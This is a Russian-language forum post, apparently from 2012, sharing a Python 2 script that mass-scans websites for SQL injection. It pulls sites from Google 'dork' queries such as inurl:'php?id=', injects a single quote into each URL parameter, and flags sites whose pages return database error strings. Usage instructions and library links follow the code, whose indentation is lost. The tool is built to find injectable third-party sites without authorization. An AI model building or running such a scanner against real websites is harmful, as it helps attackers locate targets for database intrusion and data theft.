Код:
#!/usr/bin/python
# Copyright (C) 2010 <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from multiprocessing import Process
from xgoogle.search import GoogleSearch, SearchError
from itertools import count
import urllib2, sys, argparse
global strSQLi
strSQLi = ["error in your SQL syntax", # GENERIC
"Syntax error at", # GENERIC
"You have an error in your SQL", # MYSQL
"Division by zero in", # MYSQL
"not a valid MySQL result", # MYSQL
"Call to a member function", # MYSQL
"Microsoft JET Database", # MSACCESS
"ODBC Microsoft Access Driver" # MSACCESS
"Microsoft OLE DB Provider for SQL Server", # MSSQL
"Unclosed quotation mark", # MSSQL
"Microsoft OLE DB Provider for Oracle", # ORACLE
"Macromedia][SQLServer JDBC Driver]"] # COLDFUSION
def split(alist, wanted_parts=1):
length = len(alist)
return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts]
for i in range(wanted_parts) ]
def checkSQLi(results, i):
# test single quote
for result in results[i]:
try:
if(args.verbose>='2'):
print "[INFO] Testing URL: %s" % result.url
if not "=" in result.url:
if(args.verbose>='2'):
print "[INFO] No params available for injection for: %s" % result.url
continue
response = urllib2.urlopen(result.url.replace("=", "='"))
html = response.read()
except Exception, e:
if(args.verbose>='1'):
print "[ERROR] %s" % e
continue
except KeyboardInterrupt:
return False
else:
if(checkSQLiStr(html)):
print "[INFO] URL: %s" % result.url
print " Possible vulnerable!"
else:
if(args.verbose>='1'):
print "[INFO] URL: %s" % result.url
print " Not vulnerable."
return False
def checkSQLiStr(html):
return any(checkStr in html for checkStr in strSQLi)
def main():
tries = 0
while True:
try:
if(args.verbose>='1' and tries > 0):
print "[WARNING] (%d) Retrying google search query" % tries
if(tries>=args.retry):
if(args.verbose>='1'):
print "[ERROR] Maximum retries reached..."
sys.exit()
else:
tries = tries + 1
googleSearch = GoogleSearch(args.keyword)
googleSearch.page = args.page
googleSearch.results_per_page = 100
print args.keyword
for i in count():
allResults = googleSearch.get_results()
if not allResults: # no more results (pages) were found
break
splitResults = split(allResults, args.threads)
processes = [Process(target=checkSQLi, args=(splitResults,i)) for i in range(args.threads)]
if(args.verbose>='1'):
print "[INFO] Starting %d threads..." % args.threads
for p in processes:
p.start()
for p in processes:
p.join()
tries = 0
print "Finished..."
sys.exit()
# finished
except SearchError, e:
if(args.verbose>='2'):
print "[ERROR] Search failed: %s" % e
continue
except KeyboardInterrupt:
print "Suspended by user..."
sys.exit()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-v', dest='verbose', default='0', help='Verbosity level', choices='012')
parser.add_argument('-p', dest='page', type=int, default='0', help='Start google search from page')
parser.add_argument('-s', dest='stop', type=int, default='5', help='Stop at -s page')
parser.add_argument('-r', dest='retry', type=int, default='4', help='Amount of times to retry after google search timeout')
parser.add_argument('-t', dest='threads', type=int, default='2', help='Threads for checking SQLi in query results')
group = parser.add_argument_group('required arguments')
group.add_argument('-k', dest='keyword', help='Keywords to use on google query', required=True)
args = parser.parse_args()
print "Starting..."
main()
sys.exit()
Библиотеки которые потребуются:
Код:
http://argparse.googlecode.com/svn/trunk/argparse.py
https://github.com/pkrumins/xgoogle (<-- эта библиотека должна быть пофиксена)
Как надо использовать:
Код:
usage: scanner.py [-h] [-v {0,1,2}] [-p PAGE] [-s STOP] [-r RETRY]
[-t THREADS] -k KEYWORD
optional arguments:
-h, --help show this help message and exit
-v {0,1,2} Verbosity level
-p PAGE Start google search from page
-s STOP Stop at -s page
-r RETRY Amount of times to retry after google search timeout
-t THREADS Threads for checking SQLi in query results
Example:
./scanner.py -k 'somekeyword inurl:"php?id="' -t 5 -v 1
opensc.ws
06.04.2012, 12:12
Ответ: [Python] SQL Injection Scanner
